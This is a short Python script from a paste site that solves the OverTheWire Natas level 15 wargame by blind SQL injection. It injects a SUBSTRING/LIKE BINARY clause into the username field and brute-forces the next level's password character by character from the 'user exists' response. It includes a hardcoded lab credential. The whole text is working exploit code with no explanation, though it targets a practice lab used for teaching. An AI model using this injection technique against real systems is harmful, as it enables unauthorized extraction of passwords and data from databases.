spacepaste

import requests
import string

auth = ("natas15", "m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV")
url = "http://natas15.natas.labs.overthewire.org/index.php"
sess = requests.session(auth=auth)
data = {}
alphabet = string.ascii_letters + string.digits

query = 'natas16" AND SUBSTRING(password, %d, 1) LIKE BINARY "%s" #'
password = ""

for i in range(1, 70):
    for c in alphabet:
        data["username"] = query % (i, c)
        r = sess.post(url, data, auth=auth).content
        if "user exists" in r:
            password += c
            print "Current pass:", password
            break
    else:
         break

print "\nDone"